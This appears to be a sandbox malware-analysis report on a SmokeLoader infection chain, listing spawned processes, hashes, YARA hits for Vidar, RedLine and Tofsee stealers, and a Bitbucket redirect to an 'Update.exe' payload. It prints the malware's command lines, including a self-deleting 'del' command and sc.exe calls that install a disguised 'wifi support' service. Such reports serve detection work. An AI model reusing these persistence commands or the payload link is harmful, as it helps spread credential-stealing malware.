                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/92ba8c23-8aea-43a8-8c90-5268da4578cd/downloads/6aa1f615-ccac-44c2-b595-74a855a2952e/Update.exe?Signature=8%2FiKlQkwXNjUflYkcaHfM4suFPQ%3D&Expires=1640659699&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=CRKnEzjrh.zW1Tk3ylSNWU3VI_7zx187&response-content-disposition=attachment%3B%20filename%3D%22Update.exe%22
                                                                                                                                                        X-Served-By: af165ae500f1
                                                                                                                                                        Expires: Tue, 28 Dec 2021 02:24:10 GMT
                                                                                                                                                        Content-Language: en
                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                        X-Static-Version: dfb18959be9c
                                                                                                                                                        X-Render-Time: 0.0375819206238
                                                                                                                                                        Connection: close
                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                        X-Request-Count: 2178
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Version: dfb18959be9c
                                                                                                                                                        X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                        Content-Length: 0


                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:09
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:09
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\Desktop\4BfFNMA5mb.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\4BfFNMA5mb.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:340480 bytes
                                                                                                                                                        MD5 hash:CA9543DE32176130DD7C0691ABE93D66
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:09
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:10
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:10
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:11
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:11
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\Desktop\4BfFNMA5mb.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\4BfFNMA5mb.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:340480 bytes
                                                                                                                                                        MD5 hash:CA9543DE32176130DD7C0691ABE93D66
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.347406740.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.347689698.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:11
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:11
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                        Imagebase:0x7ff7129a0000
                                                                                                                                                        File size:163336 bytes
                                                                                                                                                        MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:12
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:18
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                        Imagebase:0x7ff720ea0000
                                                                                                                                                        File size:3933184 bytes
                                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000000.337265562.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:32
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:47
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:55
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\jutawrs
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\jutawrs
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:340480 bytes
                                                                                                                                                        MD5 hash:CA9543DE32176130DD7C0691ABE93D66
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:56
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\2AA1.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\2AA1.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:339456 bytes
                                                                                                                                                        MD5 hash:DB8D46063705007002080046966E53DB
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 40%, ReversingLabs

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:57
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                                                                        File size:51288 bytes
                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:22:59
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\2AA1.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\2AA1.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:339456 bytes
                                                                                                                                                        MD5 hash:DB8D46063705007002080046966E53DB
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.406588143.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.406852686.0000000002051000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:02
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\jutawrs
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\jutawrs
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:340480 bytes
                                                                                                                                                        MD5 hash:CA9543DE32176130DD7C0691ABE93D66
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:12
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                        Imagebase:0x7ff7ef690000
                                                                                                                                                        File size:455656 bytes
                                                                                                                                                        MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:13
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                                                                        File size:625664 bytes
                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:16
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\E936.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\E936.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:342528 bytes
                                                                                                                                                        MD5 hash:BABD835D0FE9E63300B037A5AAAA4284
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.453551243.0000000000653000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000019.00000002.453551243.0000000000653000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:19
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\F3F5.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\F3F5.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:285696 bytes
                                                                                                                                                        MD5 hash:F59114142455D258FBFB4E2CF807A8F0
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.484836901.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000003.442910237.0000000000BE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.486122776.0000000000BC0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:24
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\A3D.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\A3D.exe
                                                                                                                                                        Imagebase:0x710000
                                                                                                                                                        File size:537600 bytes
                                                                                                                                                        MD5 hash:CCBCF301B4A4C51FC6AC6108E1A0A702
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.482088849.0000000003AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 60%, ReversingLabs

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:29
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\E936.exe" & exit
                                                                                                                                                        Imagebase:0xd80000
                                                                                                                                                        File size:232960 bytes
                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:29
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                                                                        File size:625664 bytes
                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:29
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\lxijggxd\
                                                                                                                                                        Imagebase:0xd80000
                                                                                                                                                        File size:232960 bytes
                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:30
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:timeout /t 5
                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                        File size:26112 bytes
                                                                                                                                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:30
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                                                                        File size:625664 bytes
                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:32
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\A3D.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\A3D.exe
                                                                                                                                                        Imagebase:0x8f0000
                                                                                                                                                        File size:537600 bytes
                                                                                                                                                        MD5 hash:CCBCF301B4A4C51FC6AC6108E1A0A702
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.470989961.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.469887932.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.470430642.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.469381814.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:32
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\almerphs.exe" C:\Windows\SysWOW64\lxijggxd\
                                                                                                                                                        Imagebase:0xd80000
                                                                                                                                                        File size:232960 bytes
                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:32
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                                                                        File size:625664 bytes
                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:34
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\sc.exe" create lxijggxd binPath= "C:\Windows\SysWOW64\lxijggxd\almerphs.exe /d\"C:\Users\user\AppData\Local\Temp\F3F5.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                        File size:60928 bytes
                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:35
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                                                                        File size:625664 bytes
                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:37
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\sc.exe" description lxijggxd "wifi internet conection
                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                        File size:60928 bytes
                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        General

                                                                                                                                                        Start time:03:23:37
                                                                                                                                                        Start date:28/12/2021
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                                                                        File size:625664 bytes
                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis

                                                                                                                                                        Reset < >